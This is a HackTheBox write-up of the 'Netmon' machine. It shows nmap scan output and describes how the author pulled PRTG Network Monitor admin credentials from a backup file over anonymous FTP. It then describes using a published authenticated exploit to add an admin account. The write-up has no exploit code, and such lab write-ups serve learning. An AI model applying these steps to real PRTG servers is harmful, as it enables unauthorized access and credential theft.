Hackthebox: Netmon Write-up

Recon

As always, started off with an NMAP scan and with an open FTP port that has what looks like directories from the typical “C:\” directory of a Windows box I decided to mount that and immediately start going through there.

21/tcp    open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  12:18AM                 1024 .rnd
| 02-25-19  10:15PM       <DIR>          inetpub
| 07-16-16  09:18AM       <DIR>          PerfLogs
| 02-25-19  10:56PM       <DIR>          Program Files
| 02-03-19  12:28AM       <DIR>          Program Files (x86)
| 02-03-19  08:08AM       <DIR>          Users
|_02-25-19  11:49PM       <DIR>          Windows
| ftp-syst:
|_  SYST: Windows_NT
80/tcp    open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Whelp, user.txt was directly accessible in the FTP directories but with the prevalence of plaintext passwords out in the wild this isn’t as silly of a thing as you might think.

After that, I decided to start looking into the webserver but after some injection testing not getting me anywhere I did some research and found that the application they’re using “PRGT Network Monitor” has some issues caching plaintext credentials in .dat files.

This took a while to search through, and after coming across some .dat files with nothing but encrypted passwords (that I didn’t end up cracking) I decided to buckle down and start searching through the program files.

This led me to finding a .bat file that pointed to a hidden folder on the FTP server that was actually accessible but not visible even when running ‘ls -la’. Lesson learned here with FTP servers, even with ‘view hidden files’ and the -a flag, it may not show the hidden directory of a Windows server.

I copied off most of these files to look through in an easier way off the FTP server and hit paydirt on the file ‘PRTG Configuration.old.bak’ that gave the credentials for the prtgadmin user for the web application.

Foothold & Admin

The network monitor tool has a lot to look through, but I ran searchsploit with ‘prtg’ and found there was a rather recent exploit published that allowed for authenticated users to add an admin user account to the server. This happens due to the network monitoring tool running as admin itself and only requires you to login and copy off the cookie you get after logging in.

Always fun using a recently published exploit

Just like that, we’re admin on the account and have grabbed root.txt! Not much in the way of new lessons learned on this one, but it was fun to use an exploit that was published for an application widely in use out in the wild. This also was interesting as when doing my enumeration on the application, there were numerous threads on Reddit and other blogs about how upset they were about the company’s screw up. Plaintext credentials are definitely a thing!